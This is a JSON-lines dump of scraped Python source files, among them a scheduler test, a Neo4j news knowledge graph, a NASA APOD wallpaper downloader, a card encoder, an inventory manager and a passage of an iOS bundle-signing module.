+{"seq_id":"27614616939","text":"import unittest\nfrom datetime import datetime, timedelta\n\nimport constants as c\nfrom utils.quartz import Scheduler\nfrom utils.common import TimeParser\n\n\nclass TestingQuartzSchedulerIntegration(unittest.TestCase):\n\n    def _get_sample(self):\n        samples = 3\n        dups = 2\n        interval = 2\n\n        samples = [\n            datetime.strftime(datetime.today() + timedelta(seconds=(interval + (x if x >= dups else 1))), c.TIME_FORMAT)\n            for x in range(samples)\n        ]\n\n        return TimeParser().parse(','.join(samples))\n\n    def test_job_scheduler_without_time_slots(self):\n\n        scd = Scheduler()\n        scd.run('', None)\n\n        self.assertEqual(len(scd.s.queue), 0, \"It should not schedule any job\")\n\n    def test_job_scheduler_with_time_slot_and_no_job(self):\n\n        scd = Scheduler()\n        scd.run(self._get_sample(), None)\n\n        self.assertEqual(len(scd.s.queue), 0, \"It should not schedule any job\")\n\n    def test_job_scheduler_with_time_slot_and_with_job(self):\n        scd = Scheduler()\n        scd.run(self._get_sample(), lambda: True)\n\n        self.assertEqual(len(scd.events), 3, \"It should schedule 3 jobs\")\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"iamomin/ip-checker","sub_path":"tests/integration/test_int_quartz.py","file_name":"test_int_quartz.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"35787348096","text":"# File: utils.py \r\n# Date: 10 gen 16\r\n# Note: modulo di funzioni utilities \r\n\r\n# dizionario di conversione degli operatori: da formato editor/GUI\r\n# a formato testuale per l'engine:\r\nopconv = {\r\n    '+' : '+',\r\n    '=' : '=',\r\n    '≠' : '!=',\r\n    '<' : '<',\r\n    '>' : '>',\r\n    '≤' : '<=',\r\n    '≥' : '>=',\r\n    '∧' : 'and',\r\n    '∨' : 'or',\r\n    '¬' : 'not',\r\n    '∩' : 'inters',\r\n    '∪' : 'union',\r\n    '÷' : 'division',\r\n    '∸' : 'difference',\r\n    'π' : 'projection',\r\n    'σ' : 'selection',\r\n    'ρ' : 'rename',\r\n    '⨝' : 'join',\r\n    '⟕' : 'ljoin',\r\n    '⟖' : 'rjoin',\r\n    '⟗' : 'fjoin',\r\n    #'←' : ':=',\r\n    '→' : '->',\r\n    '(' : '(',\r\n    ')' : ')',\r\n    '⦇' : '[',\r\n    '⦈' : ']'\r\n    }\r\n\r\ndebugmode = False\r\n\r\ndef setDebug(mode):\r\n    #print('settato debugmode =',mode)\r\n    global debugmode\r\n    debugmode = mode\r\n    \r\ndef debug(msg):\r\n    global debugmode\r\n    if debugmode:\r\n        print('DEBUG:',msg)\r\n\r\n# converte una stringa con caratteri speciali in stringa ASCII\r\n# usando le definizioni del dizionario dello Scanner\r\n# in modo da rendere s compatibile con il formato dell'engine RA\r\ndef conv(s):\r\n    # trasformazione dell'assegnazione\r\n    if s.find('←') >= 0:\r\n        s = 'set ' + s.replace('←',' ')\r\n    # trasformazione dei caratteri operatore \r\n    ris = ''\r\n    for c in s:\r\n        if c in opconv:\r\n            #ris += opconv[c]\r\n            if opconv[c][0].isalpha(): # carattere iniziale dell'operatore\r\n                ris += ' '+opconv[c]+' '\r\n            else:\r\n                ris += opconv[c]\r\n        else:\r\n            ris += c\r\n    return ris\r\n\r\n#----------------------------------------------------------------\r\nif __name__ == \"__main__\":\r\n    s = 'T1←R⨝⦇Sigla=\\'BL\\'⦈S⟕REPARTO∸x'\r\n    t = conv(s)\r\n    print('T =',t) \r\n","repo_name":"thadumi/radb","sub_path":"bin/gui/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"18831296243","text":"import logging\n\nfrom .models import FileParticipant\nfrom seahub.tags.models import FileUUIDMap\n\nlogger = logging.getLogger(__name__)\n\n\ndef list_file_participants(repo_id, path):\n    \"\"\" return participants username list\n    \"\"\"\n    username_list = []\n    try:\n        file_uuid = FileUUIDMap.objects.get_or_create_fileuuidmap_by_path(repo_id, path, False)\n\n        participant_queryset = FileParticipant.objects.get_participants(file_uuid)\n        for participant in participant_queryset:\n            username_list.append(participant.username)\n    except Exception as e:\n        logger.error(e)\n\n    return username_list\n","repo_name":"haiwen/seahub","sub_path":"seahub/file_participants/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":506,"dataset":"github-code","pt":"86"}
+{"seq_id":"3675881977","text":"import os\nimport pathlib\nimport shutil\n# local\nred = \"\\033[131m\"\noff = \"\\033[00m\"\n\nsubfix = ['.cpp','.hpp','.h','.c','.cu','.cuh']\n\nif(os.system(\"iconv --version\") != 0):\n    print(\"[iconv] not found, please install it first\")\n    exit(1)\n\n\nprint(\"traverse root directory:\", pathlib.Path(\".\").absolute())\n\nfail_list = []\nfor root, dirs, files in os.walk(\".\"):\n    path = root.split(os.sep)\n    print((len(path) - 1) * '-', os.path.basename(root))\n    for file in files:\n        print(len(path) * '-', file)\n        s = pathlib.Path(file).suffix\n        if(s in subfix):\n            fullname = os.path.join(root, file)\n            fullnametemp = fullname + \".tmp\"\n            if(os.system(\"iconv -t UTF-8 \" + fullname + \" > \" + fullnametemp) == 0):\n                shutil.copy(fullnametemp, fullname)\n            else:\n                fail_list.append( pathlib.Path(fullname).absolute())\n            os.remove(fullnametemp)\n\nfor fail in fail_list:\n    print(red, \"fail to convert:\", fail, off)\n\nif(len(fail_list) == 0):\n    print(\"all success!\")","repo_name":"MuGdxy/muda","sub_path":"scripts/encode_files.py","file_name":"encode_files.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"86"}
+{"seq_id":"33436516635","text":"from neo4j import GraphDatabase\n\n\nclass KnowledgeGraph(object):\n    def __init__(self, uri, user, password):\n        self._driver = GraphDatabase.driver(uri, auth=(user, password))\n\n    def close(self):\n        self._driver.close()\n\n    def update_kg(self, kg):\n        with self._driver.session() as session:\n            session.write_transaction(\n                self._create_news, kg['SOURCE'], kg['NEWS'],\n                kg['DATE'].strftime('%Y-%m-%d'), kg['RWORDS_COUNT']\n            )\n            for en, v in kg['ENs'].items():\n                session.write_transaction(\n                    self._create_en, kg['NEWS'], en, v['COUNT']\n                )\n                for w, j in v['RWORDS'].items():\n                    session.write_transaction(\n                        self._create_word, en, w, j['_POS'],\n                        kg['NEWS']['uri'], j['sent']\n                    )\n\n    def get_en_sentiment(self, en):\n        with self._driver.session() as session:\n            return session.write_transaction(self._get_en_sentiment, en)\n\n    def get_news(self):\n        with self._driver.session() as session:\n            return session.write_transaction(self._get_news)\n\n    def get_sentiment_by_en(self, date=None):\n        with self._driver.session() as session:\n            return session.write_transaction(self._get_sentiment_by_en,\n                                             date=date)\n\n    def get_related_news_by_date(self, date):\n        with self._driver.session() as session:\n            return session.write_transaction(self._get_related_news_by_date,\n                                             date=date)\n\n    def get_sentiments_magic_method(self, date):\n        with self._driver.session() as session:\n            return session.write_transaction(self._get_sentiments_magic_method,\n                                             date=date)\n\n    def get_data_by_source(self, date):\n        with self._driver.session() as session:\n            return session.write_transaction(self._get_data_by_source,\n                                             date=date)\n\n    @staticmethod\n    def _get_news(tx):\n        cmd = (\n            'MATCH (n:NEWS)'\n            'RETURN n'\n        )\n        return tx.run(cmd).value()\n\n    @staticmethod\n    def _create_news(tx, source, news, date, rw_c):\n        cmd = (\n            'MERGE (s:SOURCE {uri: $source })'\n            'MERGE (n:NEWS {uri: $n_uri , title: $n_title, rw_count: $rw_c})'\n            'MERGE (d:DATE {value: $date })'\n            'CREATE (s)-[r:PUBLISHES]->(n)-[:ON]->(d)'\n            'return r'\n        )\n        return tx.run(\n            cmd, source=source, n_uri=news['uri'], n_title=news['title'],\n            date=date, rw_c=rw_c)\n\n    @staticmethod\n    def _create_en(tx, news, en, count):\n        cmd = \"\"\"\n            MERGE (n:NEWS {uri: $n_uri })\n            MERGE (e:EN {uri: $en })\n            CREATE (n)-[r:MENTIONS {count: $count}]->(e)\n            return r\n        \"\"\"\n        return tx.run(cmd, n_uri=news['uri'], en=en, count=count)\n\n    @staticmethod\n    def _create_word(tx, en, word, _POS, news_id, sent):\n        cmd = \"\"\"\n            MERGE (e:EN {uri: $en })\n            MERGE (w:WORD {lemma: $word, _POS: $_POS})\n            CREATE (e)-[r:SAYS {news_id: $news_id, sent: $sent } ]->(w)\n            return r\n        \"\"\"\n        return tx.run(cmd, en=en, word=word, _POS=_POS, news_id=news_id,\n                      sent=sent)\n\n    @staticmethod\n    def _get_sentiment_by_en(tx, date):\n        if date:\n            cmd = (\n                \"MATCH (d:DATE {value: $date})-[:ON]-(n:NEWS)\"\n                \"WITH collect(n.uri) as uris\"\n                \"MATCH p=(e:EN)-[r:SAYS]-(w:WORD)\"\n                \"WHERE r.news_id in uris\"\n                \"RETURN e.uri as en, avg(reduce(totalSent = 1, \"\n                \"    s IN r.sent| totalSent + s) / size(r.sent)) as sent\"\n            )\n            return tx.run(cmd, date=date).data()\n        cmd = (\n            \"MATCH p=(e:EN)-[r:SAYS]-(w:WORD)\"\n            \"RETURN e.uri as en, avg(reduce(totalSent = 1, \"\n            \"    s IN r.sent| totalSent + s) / size(r.sent)) as sent\"\n        )\n        return tx.run(cmd).data()\n\n    @staticmethod\n    def _get_related_news_by_date(tx, date):\n        cmd = (\n            \"MATCH (d:DATE {value: $date})-[:ON]-(n:NEWS)\"\n            \"RETURN n\"\n        )\n        return tx.run(cmd, date=date).data()\n\n    @staticmethod\n    def _get_sentiments_magic_method(tx, date):\n        cmd = (\n            \"MATCH (d:DATE {value: $date})-[:ON]-(n:NEWS)-\"\n            \"[:PUBLISHES]-(s:SOURCE) \"\n            \"WITH n, s.uri as s \"\n            \"MATCH (n)-[p:MENTIONS]-(e:EN)-[m:SAYS {news_id: n.uri}]-(w:WORD) \"\n            \"WITH n, s, p, e.uri as e, w as w, \"\n            \"    reduce(t = 0, n IN m.sent | t + n) as sents, \"\n            \"    size(m.sent) as s_c \"\n            \"WITH n, s, e, {FREQ: p.count, RWORDS: apoc.map.fromLists(\"\n            \"    collect(w.lemma), collect([sents / s_c, s_c, w._POS]))} as x \"\n            \"WITH n, s, apoc.map.fromLists(collect(e), collect(x)) as ents \"\n            \"WITH n.uri as n, collect({SOURCE: s, ENs: ents, \"\n            \"    RWORDS_COUNT: n.rw_count})[0] as x \"\n            \"RETURN apoc.map.fromLists(collect(n), collect(x)) as s \"\n        )\n        return tx.run(cmd, date=date).data()[0]['s']\n\n    @staticmethod\n    def _get_data_by_source(tx, date):\n        cmd = (\n            \"MATCH (d:DATE {value: $date})-[:ON]-(n:NEWS)- \"\n            \"[:PUBLISHES]-(s:SOURCE) \"\n            \"WITH n, s.uri as s \"\n            \"MATCH (n)-[p:MENTIONS]-(e:EN)-[m:SAYS {news_id: n.uri}]-(w:WORD) \"\n            \"WITH s, p, e.uri as e, w as w, \"\n            \"    reduce(t = 0, n IN m.sent | t + n) as sents, \"\n            \"    size(m.sent) as s_c \"\n            \"WITH s, e, {RWORDS: apoc.map.fromLists( \"\n            \"    collect(w.lemma), collect([sents / s_c, s_c, w._POS]))} as x \"\n            \"WITH s, apoc.map.fromLists(collect(e), collect(x)) as ents \"\n            \"RETURN apoc.map.fromLists(collect(s), collect(ents)) as s\"\n        )\n        return tx.run(cmd, date=date).data()[0]['s']\n","repo_name":"URJCDSLab/KRAKEN-SND","sub_path":"knowledge-graph-builder/fake_news/neo4j_conn.py","file_name":"neo4j_conn.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"74769848925","text":"#! /usr/bin/python\n\nfrom pylab import *\nfrom sys import argv,exit,stdout\nimport optparse as op\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom interp import *\nfrom read_iterdb_file import *\nimport sys\n\nsys.stdout = open('lvlw.txt', 'w')\n\nparser = op.OptionParser()\noptions,args = parser.parse_args()\nc_buffer_x = float(args[0])\nbuffer_size = float(args[1])\nphysW = float(args[2])\nfile1 = args[3]\n\nl_buffer_x = float(c_buffer_x) - physW*float(buffer_size)\nr_buffer_x = float(c_buffer_x) + physW*float(buffer_size)\n\n#pdata=np.genfromtxt('p_info.dat')\n#pdata=np.genfromtxt(prof_file_name)\n#rhot=pdata[:,0]\n#te=pdata[:,2]\n\nrhot, te, ti1, ne1, ni1, nb1, vrot1 = read_iterdb_file(file1)\ne = 1.6*10**(-19)\n\nrhot_fine = linspace(rhot[0],rhot[-1],10*len(rhot))\nte_fine = interp(rhot,te,rhot_fine)\n\nl_ind = np.argmin(abs(rhot_fine - float(l_buffer_x)))\nc_ind = np.argmin(abs(rhot_fine - float(c_buffer_x)))\nr_ind = np.argmin(abs(rhot_fine - float(r_buffer_x)))\n\nte_l = te_fine[l_ind]\nte_c = te_fine[c_ind]\nte_r = te_fine[r_ind]\n\nlv = 3*np.sqrt(te_l/te_c)\nlw = lv**2\n\nprint('lv = ', lv)\nprint('te_l = ', te_l*0.001/e)\nprint('te_c = ', te_c*0.001/e)\nprint('te_r = ', te_r*0.001/e)\nprint('lw = ', lw)\nprint('buffer', l_buffer_x, r_buffer_x)\n\nnv = 48*np.sqrt(te_l/te_r)\nnw = 16*te_l/te_r\n\nprint('nv = ', nv)\nprint('nw = ', nw)\n\n","repo_name":"xingliuUT/extract_info_from_ITERDB","sub_path":"calc_lv.py","file_name":"calc_lv.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"43715299952","text":"from urllib.request import urlopen, urlretrieve\nimport re,logging,sys,ctypes,os,datetime\nfrom bs4 import BeautifulSoup\nlogging.basicConfig(format = u'%(filename)s[LINE:%(lineno)d]# %(levelname)-8s [%(asctime)s] %(message)s', filename = u'errors.txt')\n\ndef StopProgram(message):\n    logging.error(message)\n    ctypes.windll.user32.MessageBoxA(0, message, b'Error', 0)\n    sys.exit()\n\nurl = \"http://apod.nasa.gov/apod/\"\nto_find = \"IMG SRC=\"\nhtml = str(urlopen(url).read())\nhtml = html.replace('\\\\n',' ')\nsoup = BeautifulSoup(html, 'html.parser')\ntry:\n    image_url = soup.img.get('src')\nexcept:\n    StopProgram(b'Something\\'s gone wrong! Couldn\\'t find URL of the image o.O')\nfull_url = url + image_url\ndestination = 'wallpaper' + full_url[-4:]\nif '.' not in destination:\n    StopProgram(b'Something\\'s gone wrong! Couldn\\'t find \\'.\\' (full stop) in URL o.O')\nimage = urlopen(full_url).read()\nfimage = open(destination, \"wb\")\nfimage.write(image)\nfimage.close()\n\nfull_date = datetime.datetime.now().strftime(\"%Y %B %d\")\ndate = re.findall(' 0[1-9]',full_date)\nif date != []:\n    date = str(date[0])\n    full_date = full_date.replace(date[1:],date[2:])\nflag = 0\nfor string in soup.stripped_strings:\n    if flag:\n        break;\n    if string == full_date:\n        flag = 1;\nimage_name = string\nfile = open('explanation.txt',\"w\")\nfile.write(full_date+'\\n\\n')\nfile.write('\\t'+image_name+'\\n')\nflag = 0\nfor string in soup.strings:\n    if '\\\\\\'' in string:\n        string = string.replace('\\\\\\'','\\'')\n    if 'Tomorrow\\'s picture:' in string:\n        break\n    if 'Explanation:' in string:\n        flag = 1\n    if flag:\n        file.write(string)\nfile.write('\\n\\n'+url) \nfile.close()\n\nfimage_path = os.getcwd() + '\\\\' + destination\nSPI_SETDESKWALLPAPER = 20\nSPIF_UPDATEINIFILE = 0x01\nSPIF_SENDWININICHANGE = 0x02\nctypes.windll.user32.SystemParametersInfoW(SPI_SETDESKWALLPAPER, 0, fimage_path, SPIF_UPDATEINIFILE | SPIF_SENDWININICHANGE)\n","repo_name":"EChigrina/APOD-Space-Wallpaper","sub_path":"Space_Wallpaper.pyw","file_name":"Space_Wallpaper.pyw","file_ext":"pyw","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"19235775403","text":"\"\"\"\n    异常处理\n\"\"\"\n\n\ndef div_apple(apple_count):\n    person_count = int(input(\"请输入人数:\"))\n    result = apple_count / person_count\n    print(\"每个人分得%d个苹果\" % result)\n\n\n# 写法1:\n# try:\n#     div_apple(10)\n# except Exception:\n#     print(\"出错啦\")\n\n# 写法2:\n# try:\n#     div_apple(10)\n# except ValueError:\n#     print(\"不能输入非整数\")\n# except ZeroDivisionError:\n#     print(\"不能输入零\")\n\n# 写法3:\n# try:\n#     div_apple(10)\n# except ValueError:\n#     print(\"不能输入非整数\")\n# except ZeroDivisionError:\n#     print(\"不能输入零\")\n# else:\n#     print(\"分苹果成功啦\")\n\n# 写法4:\ntry:\n    div_apple(10)\nfinally:\n    print(\"无论对错一定执行的逻辑\")\n","repo_name":"fsym-fs/Python_AID","sub_path":"month01/teacher/day15/demo01.py","file_name":"demo01.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"17853056167","text":"class GameStats():\n    \"\"\"外星入侵跟踪统计.\"\"\"\n    \n    def __init__(self, ai_settings):\n        \"\"\"初始化统计信息.\"\"\"\n        self.ai_settings = ai_settings\n        self.reset_stats()\n        \n        # 在非活动状态下开始游戏.\n        self.game_active = False\n        \n        # 在非活动状态下开始游戏高分不应重置.\n        self.high_score = 0\n        \n    def reset_stats(self):\n        \"\"\"初始化可以在游戏中更改的统计信息.\"\"\"\n        self.ships_left = self.ai_settings.ship_limit\n        self.score = 0\n        self.level = 1\n","repo_name":"wangwenjiezhenshuai/dayuzhou","sub_path":"Alien/game_stats.py","file_name":"game_stats.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"21988444219","text":"import gerenciar.bd as bd\n\ndef adicionarItem():\n    condition = True\n    while condition:\n        item = str(input('\\033[1;36;40mInsira o nome do item que deseja adicionar: '))\n        quantidade = int(input('\\033[1;36;40mInsira a quantidade disponivel desse item: '))\n        bd.inserirItens(item, quantidade)\n        while True:\n            resposta = str(input('\\033[1;32;40mGostaria de adicionar mais um item?: ')).lower()\n            if(resposta == 's' or resposta == 'sim'):\n                condition = True\n                break\n            elif(resposta == 'n' or resposta == 'nao' or resposta == 'não'):\n                condition = False\n                break\n            else:\n                print('\\033[1;31;40mEscreva se sim ou não!')\n    print('\\033[0;37;40m')\n\ndef alterarItem():\n    id_item = int(input('\\033[1;36;40mDigite o id do item que deseja alterar: '))\n    item = str(input('\\033[1;36;40mInsira o novo nome do item: '))\n    bd.alterarItem(id_item, item)\n\ndef alterarQtd():\n    id_item = int(input('\\033[1;36;40mDigite o id do item que deseja alterar a quantidade: '))\n    quantidade = int(input('\\033[1;36;40mDigite a nova quantidade do item: '))\n    bd.alterarQuantidade(quantidade, id_item)\n\ndef verItens():\n    item = '[ITENS]'\n    quantidade = '[QUANTIDADE]'\n    print('{:^35} {}'.format(item, quantidade))\n    for dados in bd.lerItens(): \n        print('[Id: {}] {:^20} {:>14}'.format(dados[0], dados[1],dados[2]))\n\ndef subtrairItem():\n    condition = True\n    while condition:\n        idcomparar = int(input('\\033[1;36;40mDigite o Id do item que foi usado: '))\n        for dado in bd.lerItens():\n            if(idcomparar == dado[0]):\n                subtrai = int(input('\\033[1;36;40mQuantos itens foram utilizados?: '))\n                quantidade = int(dado[2])\n                if(quantidade >= subtrai):\n                    quantidade = quantidade - subtrai\n                    id_item = idcomparar\n                    bd.alterarQuantidade(quantidade, id_item)\n                else:\n                    print('\\033[1;31;40mNão há itens suficientes!')\n                    print('\\033[0;37;40m')\n        while True:\n            resposta = str(input('\\033[1;32;40mGostaria de subtrair de mais um item?: ')).lower()\n            if(resposta == 's' or resposta == 'sim'):\n                condition = True\n                break\n            elif(resposta == 'n' or resposta == 'nao' or resposta == 'não'):\n                condition = False\n                break\n            else:\n                print('\\033[1;31;40mEscreva se sim ou não!')\n    print('\\033[0;37;40m')\n    \n\ndef somaItem():\n    condition = True\n    while condition:\n        idcomparar = int(input('\\033[1;36;40mDigite o Id do item que foi reabastecido: '))\n        for dado in bd.lerItens():\n            if(idcomparar == dado[0]):\n                somar = int(input('\\033[1;36;40mQuantos itens foram reabastecidos?: '))\n                quantidade = int(dado[2])\n                quantidade = quantidade + somar\n                id_item = idcomparar\n                bd.alterarQuantidade(quantidade, id_item)\n        while True:\n            resposta = str(input('\\033[1;32;40mGostaria de adicionar a mais um item?: ')).lower()\n            if(resposta == 's' or resposta == 'sim'):\n                condition = True\n                break\n            elif(resposta == 'n' or resposta == 'nao' or resposta == 'não'):\n                condition = False\n                break\n            else:\n                print('\\033[1;31;40mEscreva se sim ou não!')\n    print('\\033[0;37;40m')\n\ndef excluir():\n    condition = True\n    verItens()\n    while condition:\n        try:\n            idenviar = int(input('\\033[1;36;40mDigite o id do item que deseja deletar: ')) \n        except ValueError:\n            print('\\033[1;31;40mDigite um inteiro!')\n            condition = True\n        else: \n            bd.excluir_item(idenviar)\n            condition = False\n","repo_name":"Vinissaum/Projetos","sub_path":"CodigosGerenciadorDeEstoque/programa.py","file_name":"programa.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"}
+{"seq_id":"38283923592","text":"card = 'A23456789TJQK'\n\n\ndef encode(cards):\n    card_c = {}\n    card_d = {}\n    card_h = {}\n    card_s = {}\n    big_deck = [\n        card_c, card_d, card_h, card_s\n    ]\n    count = 0\n    for i in range(0, 52):\n        if count == 13:\n            count = 0\n            big_deck.pop(0)\n        big_deck[0][card[count]] = i\n        count += 1\n    answ_list = []\n    for ele in cards:\n        if 'c' in ele:\n            answ_list.append(card_c[ele.replace('c', '')])\n        if 'd' in ele:\n            answ_list.append(card_d[ele.replace('d', '')])\n        if 'h' in ele:\n            answ_list.append(card_h[ele.replace('h', '')])\n        if 's' in ele:\n            answ_list.append(card_s[ele.replace('s', '')])\n    return sorted(answ_list)\n\n\ndef decode(cards):\n    big_deck = {\n\n    }\n    count = 0\n    suits = ['c', 'd', 'h', 's']\n    for i in range(0, 52):\n        if count == 13:\n            count = 0\n            suits.pop(0)\n        big_deck[i] = card[count] + suits[0]\n        count += 1\n    answer_list = []\n    for ele in sorted(cards):\n        answer_list.append(big_deck[ele])\n    return answer_list\n","repo_name":"MikhailGulkin/Codewars-Solutions","sub_path":"5 kyu/Poker cards encoder decoder.py","file_name":"Poker cards encoder decoder.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"4618175468","text":"\"\"\" Represents a bundle. In the words of the Apple docs, it's a convenient way to deliver\n    software. Really it's a particular kind of directory structure, with one main executable,\n    well-known places for various data files and libraries,\n    and tracking hashes of all those files for signing purposes.\n\n    For isign, we have two main kinds of bundles: the App, and the Framework (a reusable\n    library packaged along with its data files.) An App may contain many Frameworks, but\n    a Framework has to be re-signed independently.\n\n    See the Apple Developer Documentation \"About Bundles\" \"\"\"\n\nimport biplist\nimport code_resources\nfrom exceptions import NotMatched\nimport copy\nimport glob\nimport logging\nimport os\nfrom os.path import basename, exists, join, splitext\nfrom signer import openssl_command\nimport signable\nimport shutil\n\n\nlog = logging.getLogger(__name__)\n\n\ndef is_info_plist_native(plist):\n    \"\"\" If an bundle is for native iOS, it has these properties in the Info.plist\n\n        Note that starting with iOS 10, simulator framework/test bundles also need to\n        be signed (at least ad hoc).\n    \"\"\"\n    return (\n        'CFBundleSupportedPlatforms' in plist and\n        ('iPhoneOS' in plist['CFBundleSupportedPlatforms'] or 'iPhoneSimulator' in plist['CFBundleSupportedPlatforms'])\n    )\n\n\nclass Bundle(object):\n    \"\"\" A bundle is a standard directory structure, a signable, installable set of files.\n        Apps are Bundles, but so are some kinds of Frameworks (libraries) \"\"\"\n    helpers = []\n    signable_class = None\n    entitlements_path = None  # Not set for every bundle type\n\n    def __init__(self, path):\n        self.path = path\n        self.info_path = join(self.path, 'Info.plist')\n        if not exists(self.info_path):\n            raise NotMatched(\"no Info.plist found; probably not a bundle\")\n        self.info = biplist.readPlist(self.info_path)\n        self.orig_info = None\n        if not is_info_plist_native(self.info):\n            raise NotMatched(\"not a native iOS bundle\")\n        # will be added later\n        self.seal_path = None\n\n    def get_entitlements_path(self):\n        return self.entitlements_path\n\n    def get_executable_path(self):\n        \"\"\" Path to the main executable. For an app, this is app itself. For\n            a Framework, this is the main framework \"\"\"\n        executable_name = None\n        if 'CFBundleExecutable' in self.info:\n            executable_name = self.info['CFBundleExecutable']\n        else:\n            executable_name, _ = splitext(basename(self.path))\n        executable = join(self.path, executable_name)\n        if not exists(executable):\n            raise Exception(\n                'could not find executable for {0}'.format(self.path))\n        return executable\n\n    def update_info_props(self, new_props):\n        if self.orig_info is None:\n            self.orig_info = copy.deepcopy(self.info)\n\n        changed = False\n        if ('CFBundleIdentifier' in new_props and\n                'CFBundleURLTypes' in self.info and\n                'CFBundleURLTypes' not in new_props):\n            # The bundle identifier changed. Check CFBundleURLTypes for\n            # CFBundleURLName values matching the old bundle\n            # id if it's not being set explicitly\n            old_bundle_id = self.info['CFBundleIdentifier']\n            new_bundle_id = new_props['CFBundleIdentifier']\n            for url_type in self.info['CFBundleURLTypes']:\n                if 'CFBundleURLName' not in url_type:\n                    continue\n                if url_type['CFBundleURLName'] == old_bundle_id:\n                    url_type['CFBundleURLName'] = new_bundle_id\n                    changed = True\n\n        for key, val in new_props.iteritems():\n            is_new_key = key not in self.info\n            if is_new_key or self.info[key] != val:\n                if is_new_key:\n                    log.warn(\"Adding new Info.plist key: {}\".format(key))\n                self.info[key] = val\n                changed = True\n\n        if changed:\n            biplist.writePlist(self.info, self.info_path, binary=True)\n        else:\n            self.orig_info = None\n\n    def info_props_changed(self):\n        return self.orig_info is not None\n\n    def info_prop_changed(self, key):\n        if not self.orig_info:\n            # No props have been changed\n            return False\n        if key in self.info and key in self.orig_info and self.info[key] == self.orig_info[key]:\n            return False\n        return True\n\n    def get_info_prop(self, key):\n        return self.info[key]\n\n    def sign_dylibs(self, signer, path):\n        \"\"\" Sign all the dylibs in this directory \"\"\"\n        for dylib_path in glob.glob(join(path, '*.dylib')):\n            dylib = signable.Dylib(self, dylib_path, signer)\n            dylib.sign(self, signer)\n\n    def sign(self, deep, signer):\n        \"\"\" Sign everything in this bundle. If deep is specified, sign\n            recursively with sub-bundles \"\"\"\n        # log.debug(\"SIGNING: %s\" % self.path)\n        if deep:\n            frameworks_path = join(self.path, 'Frameworks')\n            if exists(frameworks_path):\n                # log.debug(\"SIGNING FRAMEWORKS: %s\" % frameworks_path)\n                # sign all the frameworks\n                for framework_name in os.listdir(frameworks_path):\n                    framework_path = join(frameworks_path, framework_name)\n                    # log.debug(\"checking for framework: %s\" % framework_path)\n                    try:\n                        framework = Framework(framework_path)\n                        # log.debug(\"resigning: %s\" % framework_path)\n                        framework.resign(deep, signer)\n                    except NotMatched:\n                        # log.debug(\"not a framework: %s\" % framework_path)\n                        continue\n                # sign all the dylibs under Frameworks\n                self.sign_dylibs(signer, frameworks_path)\n\n            # sign any dylibs in the main directory (rare, but it happens)\n            self.sign_dylibs(signer, self.path)\n\n            plugins_path = join(self.path, 'PlugIns')\n            if exists(plugins_path):\n                # sign the appex executables\n                appex_paths = glob.glob(join(plugins_path, '*.appex'))\n                for appex_path in appex_paths:\n                    plist_path = join(appex_path, 'Info.plist')\n                    if not exists(plist_path):\n                        continue\n                    plist = biplist.readPlist(plist_path)\n                    appex_exec_path = join(appex_path, plist['CFBundleExecutable'])\n                    appex = signable.Appex(self, appex_exec_path, signer)\n                    appex.sign(self, signer)\n\n        # then create the seal\n        # TODO maybe the app should know what its seal path should be...\n        self.seal_path = code_resources.make_seal(self.get_executable_path(),\n                                                  self.path)\n        # then sign the app\n        executable = self.signable_class(self, self.get_executable_path(), signer)\n        executable.sign(self, signer)\n\n    def resign(self, deep, signer):\n        \"\"\" signs bundle, modifies in place \"\"\"\n        self.sign(deep, signer)\n        log.debug(\"Resigned bundle at <%s>\", self.path)\n\n\nclass Framework(Bundle):\n    \"\"\" A bundle that comprises reusable code. Similar to an app in that it has\n        its own resources and metadata. Not like an app because the main executable\n        doesn't have Entitlements, or an Application hash, and it doesn't have its\n        own provisioning profile. \"\"\"\n\n    # the executable in this bundle will be a Framework\n    signable_class = signable.Framework\n\n    def __init__(self, path):\n        super(Framework, self).__init__(path)\n\n\nclass App(Bundle):\n    \"\"\" The kind of bundle that is visible as an app to the user.\n        Contains the provisioning profile, entitlements, etc.  \"\"\"\n\n    # the executable in this bundle will be an Executable (i.e. the main\n    # executable of an app)\n    signable_class = signable.Executable\n\n    def __init__(self, path):\n        super(App, self).__init__(path)\n        self.entitlements_path = join(self.path,\n                                      'Entitlements.plist')\n        self.provision_path = join(self.path,\n                                   'embedded.mobileprovision')\n\n    def provision(self, provision_path):\n        shutil.copyfile(provision_path, self.provision_path)\n\n    @staticmethod\n    def extract_entitlements(provision_path):\n        \"\"\" Given a path to a provisioning profile, return the entitlements\n            encoded therein \"\"\"\n        cmd = [\n            'smime',\n            '-inform', 'der',\n            '-verify',    # verifies content, prints verification status to STDERR,\n                          #  outputs content to STDOUT. In our case, will be an XML plist\n            '-noverify',  # accept self-signed certs. Not the opposite of -verify!\n            '-in', provision_path\n        ]\n        # this command always prints 'Verification successful' to stderr.\n        (profile_text, err) = openssl_command(cmd, data=None, expect_err=True)\n        if err and err.strip() != 'Verification successful':\n            log.error('Received unexpected error from openssl: {}'.format(err))\n        plist_dict = biplist.readPlistFromString(profile_text)\n    